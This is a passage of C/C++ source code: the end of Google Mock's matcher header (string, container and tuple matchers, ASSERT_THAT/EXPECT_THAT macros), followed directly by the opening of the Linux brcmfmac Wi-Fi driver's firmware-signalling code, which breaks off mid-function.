str, ignoring case. inline PolymorphicMatcher<internal::StrEqualityMatcher<internal::wstring> > StrCaseEq(const internal::wstring& str) { return MakePolymorphicMatcher(internal::StrEqualityMatcher<internal::wstring>( str, true, false)); } // Matches a string not equal to str, ignoring case. inline PolymorphicMatcher<internal::StrEqualityMatcher<internal::wstring> > StrCaseNe(const internal::wstring& str) { return MakePolymorphicMatcher(internal::StrEqualityMatcher<internal::wstring>( str, false, false)); } // Creates a matcher that matches any wstring, std::wstring, or C wide string // that contains the given substring. inline PolymorphicMatcher<internal::HasSubstrMatcher<internal::wstring> > HasSubstr(const internal::wstring& substring) { return MakePolymorphicMatcher(internal::HasSubstrMatcher<internal::wstring>( substring)); } // Matches a string that starts with 'prefix' (case-sensitive). inline PolymorphicMatcher<internal::StartsWithMatcher<internal::wstring> > StartsWith(const internal::wstring& prefix) { return MakePolymorphicMatcher(internal::StartsWithMatcher<internal::wstring>( prefix)); } // Matches a string that ends with 'suffix' (case-sensitive). inline PolymorphicMatcher<internal::EndsWithMatcher<internal::wstring> > EndsWith(const internal::wstring& suffix) { return MakePolymorphicMatcher(internal::EndsWithMatcher<internal::wstring>( suffix)); } #endif // GTEST_HAS_GLOBAL_WSTRING || GTEST_HAS_STD_WSTRING // Creates a polymorphic matcher that matches a 2-tuple where the // first field == the second field. inline internal::Eq2Matcher Eq() { return internal::Eq2Matcher(); } // Creates a polymorphic matcher that matches a 2-tuple where the // first field >= the second field. inline internal::Ge2Matcher Ge() { return internal::Ge2Matcher(); } // Creates a polymorphic matcher that matches a 2-tuple where the // first field > the second field. inline internal::Gt2Matcher Gt() { return internal::Gt2Matcher(); } // Creates a polymorphic matcher that matches a 2-tuple where the // first field <= the second field. inline internal::Le2Matcher Le() { return internal::Le2Matcher(); } // Creates a polymorphic matcher that matches a 2-tuple where the // first field < the second field. inline internal::Lt2Matcher Lt() { return internal::Lt2Matcher(); } // Creates a polymorphic matcher that matches a 2-tuple where the // first field != the second field. inline internal::Ne2Matcher Ne() { return internal::Ne2Matcher(); } // Creates a matcher that matches any value of type T that m doesn't // match. template <typename InnerMatcher> inline internal::NotMatcher<InnerMatcher> Not(InnerMatcher m) { return internal::NotMatcher<InnerMatcher>(m); } // Returns a matcher that matches anything that satisfies the given // predicate. The predicate can be any unary function or functor // whose return type can be implicitly converted to bool. template <typename Predicate> inline PolymorphicMatcher<internal::TrulyMatcher<Predicate> > Truly(Predicate pred) { return MakePolymorphicMatcher(internal::TrulyMatcher<Predicate>(pred)); } // Returns a matcher that matches the container size. The container must // support both size() and size_type which all STL-like containers provide. // Note that the parameter 'size' can be a value of type size_type as well as // matcher. For instance: // EXPECT_THAT(container, SizeIs(2)); // Checks container has 2 elements. // EXPECT_THAT(container, SizeIs(Le(2)); // Checks container has at most 2. template <typename SizeMatcher> inline internal::SizeIsMatcher<SizeMatcher> SizeIs(const SizeMatcher& size_matcher) { return internal::SizeIsMatcher<SizeMatcher>(size_matcher); } // Returns a matcher that matches the distance between the container's begin() // iterator and its end() iterator, i.e. the size of the container. This matcher // can be used instead of SizeIs with containers such as std::forward_list which // do not implement size(). The container must provide const_iterator (with // valid iterator_traits), begin() and end(). template <typename DistanceMatcher> inline internal::BeginEndDistanceIsMatcher<DistanceMatcher> BeginEndDistanceIs(const DistanceMatcher& distance_matcher) { return internal::BeginEndDistanceIsMatcher<DistanceMatcher>(distance_matcher); } // Returns a matcher that matches an equal container. // This matcher behaves like Eq(), but in the event of mismatch lists the // values that are included in one container but not the other. (Duplicate // values and order differences are not explained.) template <typename Container> inline PolymorphicMatcher<internal::ContainerEqMatcher< // NOLINT GTEST_REMOVE_CONST_(Container)> > ContainerEq(const Container& rhs) { // This following line is for working around a bug in MSVC 8.0, // which causes Container to be a const type sometimes. typedef GTEST_REMOVE_CONST_(Container) RawContainer; return MakePolymorphicMatcher( internal::ContainerEqMatcher<RawContainer>(rhs)); } // Returns a matcher that matches a container that, when sorted using // the given comparator, matches container_matcher. template <typename Comparator, typename ContainerMatcher> inline internal::WhenSortedByMatcher<Comparator, ContainerMatcher> WhenSortedBy(const Comparator& comparator, const ContainerMatcher& container_matcher) { return internal::WhenSortedByMatcher<Comparator, ContainerMatcher>( comparator, container_matcher); } // Returns a matcher that matches a container that, when sorted using // the < operator, matches container_matcher. template <typename ContainerMatcher> inline internal::WhenSortedByMatcher<internal::LessComparator, ContainerMatcher> WhenSorted(const ContainerMatcher& container_matcher) { return internal::WhenSortedByMatcher<internal::LessComparator, ContainerMatcher>( internal::LessComparator(), container_matcher); } // Matches an STL-style container or a native array that contains the // same number of elements as in rhs, where its i-th element and rhs's // i-th element (as a pair) satisfy the given pair matcher, for all i. // TupleMatcher must be able to be safely cast to Matcher<tuple<const // T1&, const T2&> >, where T1 and T2 are the types of elements in the // LHS container and the RHS container respectively. template <typename TupleMatcher, typename Container> inline internal::PointwiseMatcher<TupleMatcher, GTEST_REMOVE_CONST_(Container)> Pointwise(const TupleMatcher& tuple_matcher, const Container& rhs) { // This following line is for working around a bug in MSVC 8.0, // which causes Container to be a const type sometimes. typedef GTEST_REMOVE_CONST_(Container) RawContainer; return internal::PointwiseMatcher<TupleMatcher, RawContainer>( tuple_matcher, rhs); } // Matches an STL-style container or a native array that contains at // least one element matching the given value or matcher. // // Examples: // ::std::set<int> page_ids; // page_ids.insert(3); // page_ids.insert(1); // EXPECT_THAT(page_ids, Contains(1)); // EXPECT_THAT(page_ids, Contains(Gt(2))); // EXPECT_THAT(page_ids, Not(Contains(4))); // // ::std::map<int, size_t> page_lengths; // page_lengths[1] = 100; // EXPECT_THAT(page_lengths, // Contains(::std::pair<const int, size_t>(1, 100))); // // const char* user_ids[] = { "joe", "mike", "tom" }; // EXPECT_THAT(user_ids, Contains(Eq(::std::string("tom")))); template <typename M> inline internal::ContainsMatcher<M> Contains(M matcher) { return internal::ContainsMatcher<M>(matcher); } // Matches an STL-style container or a native array that contains only // elements matching the given value or matcher. // // Each(m) is semantically equivalent to Not(Contains(Not(m))). Only // the messages are different. // // Examples: // ::std::set<int> page_ids; // // Each(m) matches an empty container, regardless of what m is. // EXPECT_THAT(page_ids, Each(Eq(1))); // EXPECT_THAT(page_ids, Each(Eq(77))); // // page_ids.insert(3); // EXPECT_THAT(page_ids, Each(Gt(0))); // EXPECT_THAT(page_ids, Not(Each(Gt(4)))); // page_ids.insert(1); // EXPECT_THAT(page_ids, Not(Each(Lt(2)))); // // ::std::map<int, size_t> page_lengths; // page_lengths[1] = 100; // page_lengths[2] = 200; // page_lengths[3] = 300; // EXPECT_THAT(page_lengths, Not(Each(Pair(1, 100)))); // EXPECT_THAT(page_lengths, Each(Key(Le(3)))); // // const char* user_ids[] = { "joe", "mike", "tom" }; // EXPECT_THAT(user_ids, Not(Each(Eq(::std::string("tom"))))); template <typename M> inline internal::EachMatcher<M> Each(M matcher) { return internal::EachMatcher<M>(matcher); } // Key(inner_matcher) matches an std::pair whose 'first' field matches // inner_matcher. For example, Contains(Key(Ge(5))) can be used to match an // std::map that contains at least one element whose key is >= 5. template <typename M> inline internal::KeyMatcher<M> Key(M inner_matcher) { return internal::KeyMatcher<M>(inner_matcher); } // Pair(first_matcher, second_matcher) matches a std::pair whose 'first' field // matches first_matcher and whose 'second' field matches second_matcher. For // example, EXPECT_THAT(map_type, ElementsAre(Pair(Ge(5), "foo"))) can be used // to match a std::map<int, string> that contains exactly one element whose key // is >= 5 and whose value equals "foo". template <typename FirstMatcher, typename SecondMatcher> inline internal::PairMatcher<FirstMatcher, SecondMatcher> Pair(FirstMatcher first_matcher, SecondMatcher second_matcher) { return internal::PairMatcher<FirstMatcher, SecondMatcher>( first_matcher, second_matcher); } // Returns a predicate that is satisfied by anything that matches the // given matcher. template <typename M> inline internal::MatcherAsPredicate<M> Matches(M matcher) { return internal::MatcherAsPredicate<M>(matcher); } // Returns true iff the value matches the matcher. template <typename T, typename M> inline bool Value(const T& value, M matcher) { return testing::Matches(matcher)(value); } // Matches the value against the given matcher and explains the match // result to listener. template <typename T, typename M> inline bool ExplainMatchResult( M matcher, const T& value, MatchResultListener* listener) { return SafeMatcherCast<const T&>(matcher).MatchAndExplain(value, listener); } #if GTEST_LANG_CXX11 // Define variadic matcher versions. They are overloaded in // gmock-generated-matchers.h for the cases supported by pre C++11 compilers. template <typename... Args> inline internal::AllOfMatcher<Args...> AllOf(const Args&... matchers) { return internal::AllOfMatcher<Args...>(matchers...); } template <typename... Args> inline internal::AnyOfMatcher<Args...> AnyOf(const Args&... matchers) { return internal::AnyOfMatcher<Args...>(matchers...); } #endif // GTEST_LANG_CXX11 // AllArgs(m) is a synonym of m. This is useful in // // EXPECT_CALL(foo, Bar(_, _)).With(AllArgs(Eq())); // // which is easier to read than // // EXPECT_CALL(foo, Bar(_, _)).With(Eq()); template <typename InnerMatcher> inline InnerMatcher AllArgs(const InnerMatcher& matcher) { return matcher; } // These macros allow using matchers to check values in Google Test // tests. ASSERT_THAT(value, matcher) and EXPECT_THAT(value, matcher) // succeed iff the value matches the matcher. If the assertion fails, // the value and the description of the matcher will be printed. #define ASSERT_THAT(value, matcher) ASSERT_PRED_FORMAT1(\ ::testing::internal::MakePredicateFormatterFromMatcher(matcher), value) #define EXPECT_THAT(value, matcher) EXPECT_PRED_FORMAT1(\ ::testing::internal::MakePredicateFormatterFromMatcher(matcher), value) } // namespace testing #endif // GMOCK_INCLUDE_GMOCK_GMOCK_MATCHERS_H_
/* * Copyright (c) 2010 Broadcom Corporation * * Permission to use, copy, modify, and/or distribute this software for any * purpose with or without fee is hereby granted, provided that the above * copyright notice and this permission notice appear in all copies. * * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY * SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION * OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN * CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. */ #include <linux/types.h> #include <linux/module.h> #include <linux/if_ether.h> #include <linux/spinlock.h> #include <linux/skbuff.h> #include <linux/netdevice.h> #include <linux/etherdevice.h> #include <linux/err.h> #include <linux/jiffies.h> #include <net/cfg80211.h> #include <brcmu_utils.h> #include <brcmu_wifi.h> #include "core.h" #include "debug.h" #include "bus.h" #include "fwil.h" #include "fwil_types.h" #include "fweh.h" #include "fwsignal.h" #include "p2p.h" #include "cfg80211.h" #include "proto.h" /** * DOC: Firmware Signalling * * Firmware can send signals to host and vice versa, which are passed in the * data packets using TLV based header. This signalling layer is on top of the * BDC bus protocol layer. */ /* * single definition for firmware-driver flow control tlv's. * * each tlv is specified by BRCMF_FWS_TLV_DEF(name, ID, length). * A length value 0 indicates variable length tlv. */ #define BRCMF_FWS_TLV_DEFLIST \ BRCMF_FWS_TLV_DEF(MAC_OPEN, 1, 1) \ BRCMF_FWS_TLV_DEF(MAC_CLOSE, 2, 1) \ BRCMF_FWS_TLV_DEF(MAC_REQUEST_CREDIT, 3, 2) \ BRCMF_FWS_TLV_DEF(TXSTATUS, 4, 4) \ BRCMF_FWS_TLV_DEF(PKTTAG, 5, 4) \ BRCMF_FWS_TLV_DEF(MACDESC_ADD, 6, 8) \ BRCMF_FWS_TLV_DEF(MACDESC_DEL, 7, 8) \ BRCMF_FWS_TLV_DEF(RSSI, 8, 1) \ BRCMF_FWS_TLV_DEF(INTERFACE_OPEN, 9, 1) \ BRCMF_FWS_TLV_DEF(INTERFACE_CLOSE, 10, 1) \ BRCMF_FWS_TLV_DEF(FIFO_CREDITBACK, 11, 6) \ BRCMF_FWS_TLV_DEF(PENDING_TRAFFIC_BMP, 12, 2) \ BRCMF_FWS_TLV_DEF(MAC_REQUEST_PACKET, 13, 3) \ BRCMF_FWS_TLV_DEF(HOST_REORDER_RXPKTS, 14, 10) \ BRCMF_FWS_TLV_DEF(TRANS_ID, 18, 6) \ BRCMF_FWS_TLV_DEF(COMP_TXSTATUS, 19, 1) \ BRCMF_FWS_TLV_DEF(FILLER, 255, 0) /* * enum brcmf_fws_tlv_type - definition of tlv identifiers. */ #define BRCMF_FWS_TLV_DEF(name, id, len) \ BRCMF_FWS_TYPE_ ## name = id, enum brcmf_fws_tlv_type { BRCMF_FWS_TLV_DEFLIST BRCMF_FWS_TYPE_INVALID }; #undef BRCMF_FWS_TLV_DEF /* * enum brcmf_fws_tlv_len - definition of tlv lengths. */ #define BRCMF_FWS_TLV_DEF(name, id, len) \ BRCMF_FWS_TYPE_ ## name ## _LEN = (len), enum brcmf_fws_tlv_len { BRCMF_FWS_TLV_DEFLIST }; #undef BRCMF_FWS_TLV_DEF #ifdef DEBUG /* * brcmf_fws_tlv_names - array of tlv names. */ #define BRCMF_FWS_TLV_DEF(name, id, len) \ { id, #name }, static struct { enum brcmf_fws_tlv_type id; const char *name; } brcmf_fws_tlv_names[] = { BRCMF_FWS_TLV_DEFLIST }; #undef BRCMF_FWS_TLV_DEF static const char *brcmf_fws_get_tlv_name(enum brcmf_fws_tlv_type id) { int i; for (i = 0; i < ARRAY_SIZE(brcmf_fws_tlv_names); i++) if (brcmf_fws_tlv_names[i].id == id) return brcmf_fws_tlv_names[i].name; return "INVALID"; } #else static const char *brcmf_fws_get_tlv_name(enum brcmf_fws_tlv_type id) { return "NODEBUG"; } #endif /* DEBUG */ /* * The PKTTAG tlv has additional bytes when firmware-signalling * mode has REUSESEQ flag set. */ #define BRCMF_FWS_TYPE_SEQ_LEN 2 /* * flags used to enable tlv signalling from firmware. */ #define BRCMF_FWS_FLAGS_RSSI_SIGNALS 0x0001 #define BRCMF_FWS_FLAGS_XONXOFF_SIGNALS 0x0002 #define BRCMF_FWS_FLAGS_CREDIT_STATUS_SIGNALS 0x0004 #define BRCMF_FWS_FLAGS_HOST_PROPTXSTATUS_ACTIVE 0x0008 #define BRCMF_FWS_FLAGS_PSQ_GENERATIONFSM_ENABLE 0x0010 #define BRCMF_FWS_FLAGS_PSQ_ZERO_BUFFER_ENABLE 0x0020 #define BRCMF_FWS_FLAGS_HOST_RXREORDER_ACTIVE 0x0040 #define BRCMF_FWS_MAC_DESC_TABLE_SIZE 32 #define BRCMF_FWS_MAC_DESC_ID_INVALID 0xff #define BRCMF_FWS_HOSTIF_FLOWSTATE_OFF 0 #define BRCMF_FWS_HOSTIF_FLOWSTATE_ON 1 #define BRCMF_FWS_FLOWCONTROL_HIWATER 128 #define BRCMF_FWS_FLOWCONTROL_LOWATER 64 #define BRCMF_FWS_PSQ_PREC_COUNT ((BRCMF_FWS_FIFO_COUNT + 1) * 2) #define BRCMF_FWS_PSQ_LEN 256 #define BRCMF_FWS_HTOD_FLAG_PKTFROMHOST 0x01 #define BRCMF_FWS_HTOD_FLAG_PKT_REQUESTED 0x02 #define BRCMF_FWS_RET_OK_NOSCHEDULE 0 #define BRCMF_FWS_RET_OK_SCHEDULE 1 #define BRCMF_FWS_MODE_REUSESEQ_SHIFT 3 /* seq reuse */ #define BRCMF_FWS_MODE_SET_REUSESEQ(x, val) ((x) = \ ((x) & ~(1 << BRCMF_FWS_MODE_REUSESEQ_SHIFT)) | \ (((val) & 1) << BRCMF_FWS_MODE_REUSESEQ_SHIFT)) #define BRCMF_FWS_MODE_GET_REUSESEQ(x) \ (((x) >> BRCMF_FWS_MODE_REUSESEQ_SHIFT) & 1) /** * enum brcmf_fws_skb_state - indicates processing state of skb. * * @BRCMF_FWS_SKBSTATE_NEW: sk_buff is newly arrived in the driver. * @BRCMF_FWS_SKBSTATE_DELAYED: sk_buff had to wait on queue. * @BRCMF_FWS_SKBSTATE_SUPPRESSED: sk_buff has been suppressed by firmware. * @BRCMF_FWS_SKBSTATE_TIM: allocated for TIM update info. */ enum brcmf_fws_skb_state { BRCMF_FWS_SKBSTATE_NEW, BRCMF_FWS_SKBSTATE_DELAYED, BRCMF_FWS_SKBSTATE_SUPPRESSED, BRCMF_FWS_SKBSTATE_TIM }; /** * struct brcmf_skbuff_cb - control buffer associated with skbuff. * * @bus_flags: 2 bytes reserved for bus specific parameters * @if_flags: holds interface index and packet related flags. * @htod: host to device packet identifier (used in PKTTAG tlv). * @htod_seq: this 16-bit is original seq number for every suppress packet. * @state: transmit state of the packet. * @mac: descriptor related to destination for this packet. * * This information is stored in control buffer struct sk_buff::cb, which * provides 48 bytes of storage so this structure should not exceed that. */ struct brcmf_skbuff_cb { u16 bus_flags; u16 if_flags; u32 htod; u16 htod_seq; enum brcmf_fws_skb_state state; struct brcmf_fws_mac_descriptor *mac; }; /* * macro casting skbuff control buffer to struct brcmf_skbuff_cb. */ #define brcmf_skbcb(skb) ((struct brcmf_skbuff_cb *)((skb)->cb)) /* * sk_buff control if flags * * b[11] - packet sent upon firmware request. * b[10] - packet only contains signalling data. * b[9] - packet is a tx packet. * b[8] - packet used requested credit * b[7] - interface in AP mode. * b[3:0] - interface index. */ #define BRCMF_SKB_IF_FLAGS_REQUESTED_MASK 0x0800 #define BRCMF_SKB_IF_FLAGS_REQUESTED_SHIFT 11 #define BRCMF_SKB_IF_FLAGS_SIGNAL_ONLY_MASK 0x0400 #define BRCMF_SKB_IF_FLAGS_SIGNAL_ONLY_SHIFT 10 #define BRCMF_SKB_IF_FLAGS_TRANSMIT_MASK 0x0200 #define BRCMF_SKB_IF_FLAGS_TRANSMIT_SHIFT 9 #define BRCMF_SKB_IF_FLAGS_REQ_CREDIT_MASK 0x0100 #define BRCMF_SKB_IF_FLAGS_REQ_CREDIT_SHIFT 8 #define BRCMF_SKB_IF_FLAGS_IF_AP_MASK 0x0080 #define BRCMF_SKB_IF_FLAGS_IF_AP_SHIFT 7 #define BRCMF_SKB_IF_FLAGS_INDEX_MASK 0x000f #define BRCMF_SKB_IF_FLAGS_INDEX_SHIFT 0 #define brcmf_skb_if_flags_set_field(skb, field, value) \ brcmu_maskset16(&(brcmf_skbcb(skb)->if_flags), \ BRCMF_SKB_IF_FLAGS_ ## field ## _MASK, \ BRCMF_SKB_IF_FLAGS_ ## field ## _SHIFT, (value)) #define brcmf_skb_if_flags_get_field(skb, field) \ brcmu_maskget16(brcmf_skbcb(skb)->if_flags, \ BRCMF_SKB_IF_FLAGS_ ## field ## _MASK, \ BRCMF_SKB_IF_FLAGS_ ## field ## _SHIFT) /* * sk_buff control packet identifier * * 32-bit packet identifier used in PKTTAG tlv from host to dongle. * * - Generated at the host (e.g. dhd) * - Seen as a generic sequence number by firmware except for the flags field. * * Generation : b[31] => generation number for this packet [host->fw] * OR, current generation number [fw->host] * Flags : b[30:27] => command, status flags * FIFO-AC : b[26:24] => AC-FIFO id * h-slot : b[23:8] => hanger-slot * freerun : b[7:0] => A free running counter */ #define BRCMF_SKB_HTOD_TAG_GENERATION_MASK 0x80000000 #define BRCMF_SKB_HTOD_TAG_GENERATION_SHIFT 31 #define BRCMF_SKB_HTOD_TAG_FLAGS_MASK 0x78000000 #define BRCMF_SKB_HTOD_TAG_FLAGS_SHIFT 27 #define BRCMF_SKB_HTOD_TAG_FIFO_MASK 0x07000000 #define BRCMF_SKB_HTOD_TAG_FIFO_SHIFT 24 #define BRCMF_SKB_HTOD_TAG_HSLOT_MASK 0x00ffff00 #define BRCMF_SKB_HTOD_TAG_HSLOT_SHIFT 8 #define BRCMF_SKB_HTOD_TAG_FREERUN_MASK 0x000000ff #define BRCMF_SKB_HTOD_TAG_FREERUN_SHIFT 0 #define brcmf_skb_htod_tag_set_field(skb, field, value) \ brcmu_maskset32(&(brcmf_skbcb(skb)->htod), \ BRCMF_SKB_HTOD_TAG_ ## field ## _MASK, \ BRCMF_SKB_HTOD_TAG_ ## field ## _SHIFT, (value)) #define brcmf_skb_htod_tag_get_field(skb, field) \ brcmu_maskget32(brcmf_skbcb(skb)->htod, \ BRCMF_SKB_HTOD_TAG_ ## field ## _MASK, \ BRCMF_SKB_HTOD_TAG_ ## field ## _SHIFT) #define BRCMF_SKB_HTOD_SEQ_FROMFW_MASK 0x2000 #define BRCMF_SKB_HTOD_SEQ_FROMFW_SHIFT 13 #define BRCMF_SKB_HTOD_SEQ_FROMDRV_MASK 0x1000 #define BRCMF_SKB_HTOD_SEQ_FROMDRV_SHIFT 12 #define BRCMF_SKB_HTOD_SEQ_NR_MASK 0x0fff #define BRCMF_SKB_HTOD_SEQ_NR_SHIFT 0 #define brcmf_skb_htod_seq_set_field(skb, field, value) \ brcmu_maskset16(&(brcmf_skbcb(skb)->htod_seq), \ BRCMF_SKB_HTOD_SEQ_ ## field ## _MASK, \ BRCMF_SKB_HTOD_SEQ_ ## field ## _SHIFT, (value)) #define brcmf_skb_htod_seq_get_field(skb, field) \ brcmu_maskget16(brcmf_skbcb(skb)->htod_seq, \ BRCMF_SKB_HTOD_SEQ_ ## field ## _MASK, \ BRCMF_SKB_HTOD_SEQ_ ## field ## _SHIFT) #define BRCMF_FWS_TXSTAT_GENERATION_MASK 0x80000000 #define BRCMF_FWS_TXSTAT_GENERATION_SHIFT 31 #define BRCMF_FWS_TXSTAT_FLAGS_MASK 0x78000000 #define BRCMF_FWS_TXSTAT_FLAGS_SHIFT 27 #define BRCMF_FWS_TXSTAT_FIFO_MASK 0x07000000 #define BRCMF_FWS_TXSTAT_FIFO_SHIFT 24 #define BRCMF_FWS_TXSTAT_HSLOT_MASK 0x00FFFF00 #define BRCMF_FWS_TXSTAT_HSLOT_SHIFT 8 #define BRCMF_FWS_TXSTAT_FREERUN_MASK 0x000000FF #define BRCMF_FWS_TXSTAT_FREERUN_SHIFT 0 #define brcmf_txstatus_get_field(txs, field) \ brcmu_maskget32(txs, BRCMF_FWS_TXSTAT_ ## field ## _MASK, \ BRCMF_FWS_TXSTAT_ ## field ## _SHIFT) /* How long to defer borrowing in jiffies */ #define BRCMF_FWS_BORROW_DEFER_PERIOD (HZ / 10) /** * enum brcmf_fws_fifo - fifo indices used by dongle firmware. * * @BRCMF_FWS_FIFO_FIRST: first fifo, ie. background. * @BRCMF_FWS_FIFO_AC_BK: fifo for background traffic. * @BRCMF_FWS_FIFO_AC_BE: fifo for best-effort traffic. * @BRCMF_FWS_FIFO_AC_VI: fifo for video traffic. * @BRCMF_FWS_FIFO_AC_VO: fifo for voice traffic. * @BRCMF_FWS_FIFO_BCMC: fifo for broadcast/multicast (AP only). * @BRCMF_FWS_FIFO_ATIM: fifo for ATIM (AP only). * @BRCMF_FWS_FIFO_COUNT: number of fifos. */ enum brcmf_fws_fifo { BRCMF_FWS_FIFO_FIRST, BRCMF_FWS_FIFO_AC_BK = BRCMF_FWS_FIFO_FIRST, BRCMF_FWS_FIFO_AC_BE, BRCMF_FWS_FIFO_AC_VI, BRCMF_FWS_FIFO_AC_VO, BRCMF_FWS_FIFO_BCMC, BRCMF_FWS_FIFO_ATIM, BRCMF_FWS_FIFO_COUNT }; /** * enum brcmf_fws_txstatus - txstatus flag values. * * @BRCMF_FWS_TXSTATUS_DISCARD: * host is free to discard the packet. * @BRCMF_FWS_TXSTATUS_CORE_SUPPRESS: * 802.11 core suppressed the packet. * @BRCMF_FWS_TXSTATUS_FW_PS_SUPPRESS: * firmware suppress the packet as device is already in PS mode. * @BRCMF_FWS_TXSTATUS_FW_TOSSED: * firmware tossed the packet. * @BRCMF_FWS_TXSTATUS_HOST_TOSSED: * host tossed the packet. */ enum brcmf_fws_txstatus { BRCMF_FWS_TXSTATUS_DISCARD, BRCMF_FWS_TXSTATUS_CORE_SUPPRESS, BRCMF_FWS_TXSTATUS_FW_PS_SUPPRESS, BRCMF_FWS_TXSTATUS_FW_TOSSED, BRCMF_FWS_TXSTATUS_HOST_TOSSED }; enum brcmf_fws_fcmode { BRCMF_FWS_FCMODE_NONE, BRCMF_FWS_FCMODE_IMPLIED_CREDIT, BRCMF_FWS_FCMODE_EXPLICIT_CREDIT }; enum brcmf_fws_mac_desc_state { BRCMF_FWS_STATE_OPEN = 1, BRCMF_FWS_STATE_CLOSE }; /** * struct brcmf_fws_mac_descriptor - firmware signalling data per node/interface * * @occupied: slot is in use. * @mac_handle: handle for mac entry determined by firmware. * @interface_id: interface index. * @state: current state. * @suppressed: mac entry is suppressed. * @generation: generation bit. * @ac_bitmap: ac queue bitmap. * @requested_credit: credits requested by firmware. * @ea: ethernet address. * @seq: per-node free-running sequence. * @psq: power-save queue. * @transit_count: packet in transit to firmware. */ struct brcmf_fws_mac_descriptor { char name[16]; u8 occupied; u8 mac_handle; u8 interface_id; u8 state; bool suppressed; u8 generation; u8 ac_bitmap; u8 requested_credit; u8 requested_packet; u8 ea[ETH_ALEN]; u8 seq[BRCMF_FWS_FIFO_COUNT]; struct pktq psq; int transit_count; int suppr_transit_count; bool send_tim_signal; u8 traffic_pending_bmp; u8 traffic_lastreported_bmp; }; #define BRCMF_FWS_HANGER_MAXITEMS 1024 /** * enum brcmf_fws_hanger_item_state - state of hanger item. * * @BRCMF_FWS_HANGER_ITEM_STATE_FREE: item is free for use. * @BRCMF_FWS_HANGER_ITEM_STATE_INUSE: item is in use. * @BRCMF_FWS_HANGER_ITEM_STATE_INUSE_SUPPRESSED: item was suppressed. */ enum brcmf_fws_hanger_item_state { BRCMF_FWS_HANGER_ITEM_STATE_FREE = 1, BRCMF_FWS_HANGER_ITEM_STATE_INUSE, BRCMF_FWS_HANGER_ITEM_STATE_INUSE_SUPPRESSED }; /** * struct brcmf_fws_hanger_item - single entry for tx pending packet. * * @state: entry is either free or occupied. * @pkt: packet itself. */ struct brcmf_fws_hanger_item { enum brcmf_fws_hanger_item_state state; struct sk_buff *pkt; }; /** * struct brcmf_fws_hanger - holds packets awaiting firmware txstatus. * * @pushed: packets pushed to await txstatus. * @popped: packets popped upon handling txstatus. * @failed_to_push: packets that could not be pushed. * @failed_to_pop: packets that could not be popped. * @failed_slotfind: packets for which failed to find an entry. * @slot_pos: last returned item index for a free entry. * @items: array of hanger items. */ struct brcmf_fws_hanger { u32 pushed; u32 popped; u32 failed_to_push; u32 failed_to_pop; u32 failed_slotfind; u32 slot_pos; struct brcmf_fws_hanger_item items[BRCMF_FWS_HANGER_MAXITEMS]; }; struct brcmf_fws_macdesc_table { struct brcmf_fws_mac_descriptor nodes[BRCMF_FWS_MAC_DESC_TABLE_SIZE]; struct brcmf_fws_mac_descriptor iface[BRCMF_MAX_IFS]; struct brcmf_fws_mac_descriptor other; }; struct brcmf_fws_stats { u32 tlv_parse_failed; u32 tlv_invalid_type; u32 header_only_pkt; u32 header_pulls; u32 pkt2bus; u32 send_pkts[5]; u32 requested_sent[5]; u32 generic_error; u32 mac_update_failed; u32 mac_ps_update_failed; u32 if_update_failed; u32 packet_request_failed; u32 credit_request_failed; u32 rollback_success; u32 rollback_failed; u32 delayq_full_error; u32 supprq_full_error; u32 txs_indicate; u32 txs_discard; u32 txs_supp_core; u32 txs_supp_ps; u32 txs_tossed; u32 txs_host_tossed; u32 bus_flow_block; u32 fws_flow_block; }; struct brcmf_fws_info { struct brcmf_pub *drvr; spinlock_t spinlock; ulong flags; struct brcmf_fws_stats stats; struct brcmf_fws_hanger hanger; enum brcmf_fws_fcmode fcmode; bool fw_signals; bool bcmc_credit_check; struct brcmf_fws_macdesc_table desc; struct workqueue_struct *fws_wq; struct work_struct fws_dequeue_work; u32 fifo_enqpkt[BRCMF_FWS_FIFO_COUNT]; int fifo_credit[BRCMF_FWS_FIFO_COUNT]; int credits_borrowed[BRCMF_FWS_FIFO_AC_VO + 1]; int deq_node_pos[BRCMF_FWS_FIFO_COUNT]; u32 fifo_credit_map; u32 fifo_delay_map; unsigned long borrow_defer_timestamp; bool bus_flow_blocked; bool creditmap_received; u8 mode; bool avoid_queueing; }; /* * brcmf_fws_prio2fifo - mapping from 802.1d priority to firmware fifo index. */ static const int brcmf_fws_prio2fifo[] = { BRCMF_FWS_FIFO_AC_BE, BRCMF_FWS_FIFO_AC_BK, BRCMF_FWS_FIFO_AC_BK, BRCMF_FWS_FIFO_AC_BE, BRCMF_FWS_FIFO_AC_VI, BRCMF_FWS_FIFO_AC_VI, BRCMF_FWS_FIFO_AC_VO, BRCMF_FWS_FIFO_AC_VO }; static int fcmode; module_param(fcmode, int, S_IRUSR); MODULE_PARM_DESC(fcmode, "mode of firmware signalled flow control"); #define BRCMF_FWS_TLV_DEF(name, id, len) \ case BRCMF_FWS_TYPE_ ## name: \ return len; /** * brcmf_fws_get_tlv_len() - returns defined length for given tlv id. * * @fws: firmware-signalling information. * @id: identifier of the TLV. * * Return: the specified length for the given TLV; Otherwise -EINVAL. */ static int brcmf_fws_get_tlv_len(struct brcmf_fws_info *fws, enum brcmf_fws_tlv_type id) { switch (id) { BRCMF_FWS_TLV_DEFLIST default: fws->stats.tlv_invalid_type++; break; } return -EINVAL; } #undef BRCMF_FWS_TLV_DEF static void brcmf_fws_lock(struct brcmf_fws_info *fws) __acquires(&fws->spinlock) { spin_lock_irqsave(&fws->spinlock, fws->flags); } static void brcmf_fws_unlock(struct brcmf_fws_info *fws) __releases(&fws->spinlock) { spin_unlock_irqrestore(&fws->spinlock, fws->flags); } static bool brcmf_fws_ifidx_match(struct sk_buff *skb, void *arg) { u32 ifidx = brcmf_skb_if_flags_get_field(skb, INDEX); return ifidx == *(int *)arg; } static void brcmf_fws_psq_flush(struct brcmf_fws_info *fws, struct pktq *q, int ifidx) { bool (*matchfn)(struct sk_buff *, void *) = NULL; struct sk_buff *skb; int prec; if (ifidx != -1) matchfn = brcmf_fws_ifidx_match; for (prec = 0; prec < q->num_prec; prec++) { skb = brcmu_pktq_pdeq_match(q, 